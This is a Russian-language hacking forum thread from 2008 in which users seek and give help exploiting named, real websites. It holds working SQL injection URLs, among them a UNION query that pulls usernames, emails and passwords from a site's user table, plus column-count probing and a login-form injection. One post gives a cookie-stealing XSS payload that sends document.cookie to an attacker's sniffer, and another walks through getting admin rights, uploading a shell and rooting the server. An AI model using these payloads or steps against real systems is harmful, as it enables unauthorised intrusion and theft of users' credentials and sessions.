Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Sanic1977
    никак нема иьекта )
     
  2. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    инъект отсутствует
     
  3. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    http://www.comingsoon.net/news.php?id=1'

    Получил вот такой ответ

    Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

    Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.
     
  4. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Есть, но там по-моему только бенчмарком инфу из бд доставать посимвольно, ибо идет два запроса
     
    1 person likes this.
  5. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть ;)
    http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
    4.1.22
    на брут не ставил.. ибо мне это не к чему ..
     
    3 people like this.
  6. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    тоесть в принципе можно поковырять до конца?:) может у кого еще какие варианты,?
     
  7. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
    Mysql привязан к директадминЧеку....
    Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
    В то числе и рутовским.
    такое можно сотворить?
     
  8. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Товарищи, будте внимательнее =)
    Code:
    http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char(58),user_id,name,email,password,title,access),1+from+NEX_USERS+limit+0,1/*
     
    3 people like this.
  9. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
    PS Иначе никак, на то они и рутовские ;)
     
  10. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://db.zenyro.ru/items/use.html'
    Возможна ли инъекция?
     
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    DimOnOID
    да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
     
    #3971 sabe, 4 Dec 2008
    Last edited: 4 Dec 2008
    1 person likes this.
  12. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://db.zenyro.ru/items/use.html'order+by+2--+
    1 колонка..вывода нету..как слепую заюзать не удаётца
     
  13. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Проблема с:
    HTML:
    http://www.mcmusic.ie/index.asp?secID=1'&part=1
    Помогите раскрутить. Очень нужно :)
     
  14. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    584
    Likes Received:
    284
    Reputations:
    51
    ~EviL~
    ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором... ;)
     
    1 person likes this.
  15. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Спасибо :) Попробую довести до победного конца =)
     
  16. NetSter

    NetSter Moderator

    Joined:
    30 Jul 2007
    Messages:
    810
    Likes Received:
    413
    Reputations:
    62
    в этом деле новичок.
    еще пока не научился использовать XSS но уже нашел парочку. может кому пригодится кто шарит в этом.
    [​IMG] [​IMG]

    там в нескольких нужно вбивать в поля.
    PS/ сильно не пинать я только учусь. ;)
     
    _________________________
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а чо там использвать - втавляй вместо alert('xss') такой код:

    window.location.href='http://твой_сайт/s.gif?'+document.cookie;

    где s.gif - твой снифер

    и давай такую ссылку, чтобы он по ней тыцкнул тому, чьи куки хочешь поиметь
     
    1 person likes this.
  18. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    с перенаправлением галимо и палевно. Лучше создавать картинку посредством яваскрипт
     
  19. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Есть сервер с багнутым ПОСТ запросом.
    Login, pwd.
    Баг в первом варианте. Причем надо чтоб было хоть что - либо во втором.
    Пример:

    Login: ' or 1=(@@version)--
    Pwd: kakawka

    :
    Microsoft OLE DB Provider for SQL Server error '80040e14'

    Incorrect syntax near the keyword 'or'.


    Что посоветуете в данном вопросе? (чтоб вывело результат первого запроса)
     
  20. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    У меня сейчас подобная проблема. При вводе вышеуказанной комбинации сервер отвечает:
    Пробелы он не воспринимает. Как можно указать пробелы? Пытался
     
    #3980 Ershik, 4 Dec 2008
    Last edited: 5 Dec 2008
Loading...
Thread Status:
Not open for further replies.